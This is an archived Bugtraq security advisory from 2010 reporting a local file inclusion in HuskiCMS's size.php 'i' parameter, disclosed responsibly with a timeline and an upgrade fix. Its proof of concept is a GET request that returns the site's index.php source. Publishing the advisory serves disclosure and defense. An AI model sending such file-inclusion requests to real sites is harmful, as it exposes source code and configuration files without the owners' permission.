[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

JAHx102 - HuskiCMS local file inclusion

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: JAHx102 - HuskiCMS local file inclusion
From: noreply@xxxxxxxxxxxxxxxxxxxxx
Date: Thu, 4 Feb 2010 22:14:05 -0700

--------------------------------------------------------------------------------------------
20100205 - Justanotherhacker.com : HuskiCMS local file inclusion
JAHx102 - http://www.justanotherhacker.com/advisories/JAHx102.txt
--------------------------------------------------------------------------------------------

HuskiCMS
huski CMS effectively places the control of the website back into the hands of 
you, the site owner. huski CMS is extremely user friendly and has been 
developed with the lowest denominator in IT knowledge in mind. huski CMS is 
still a very powerful and flexible system which ensures your site is using the 
latest technologies such as AJAX, XML, XHTML, and CSS
[ Taken from: http://www.huskicms.com ]


--- Vulnerability description ---
A conditional local file inclusion exists in the image resizing script 
size.php's i parameter.
The parameter is not filtered and allows arbitrary file inclusion.

Type: Local File Inclusion
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive - http://www.ascetinteractive.com
Affected versions:
Unknown

--- Proof of Concept ---
~$ GET 'http://[target]/size.php?i=index.php'
<?php
        header ('Content-Type: text/html; charset=utf-8');
        // Data Includes
        include_once "PHPLib/db_mysql.inc";
        include_once "Data/dbConnection.class.php";
        include_once "Data/dbConfig.class.php";
        include_once "Data/dataAdapter.class.php";
        include_once "Quicksite/Core/domxml.class.php";


        // Quicksite Core Includes
        include_once "Quicksite/Core/all.inc.php";
        
        // Configuration
        include_once "Quicksite/db.config.php";
        include_once "inc/vars.config.php";

        // Initialise the Site
        $site = new Site($_VARS['site']);
        print_r($_SESSION['login']);
        // Initialise the Page
        $page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));

        // Load plugin sources
        $page->loadPluginSources();
        
        // Create the Page
        $page->createPage();
        
        echo $page->Result;
?>


--- Solution ---
Upgrade to a more recent version

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledge vulnerability
28-Jan-2010 - Vendor notified through email

Prev by Date: JAHx101 - Huski retail mulitple SQL injection vulnerabilities
Next by Date: Secunia Research: libmikmod Module Parsing Vulnerabilities
Previous by thread: JAHx101 - Huski retail mulitple SQL injection vulnerabilities
Next by thread: Secunia Research: libmikmod Module Parsing Vulnerabilities
Index(es):
- Date
- Thread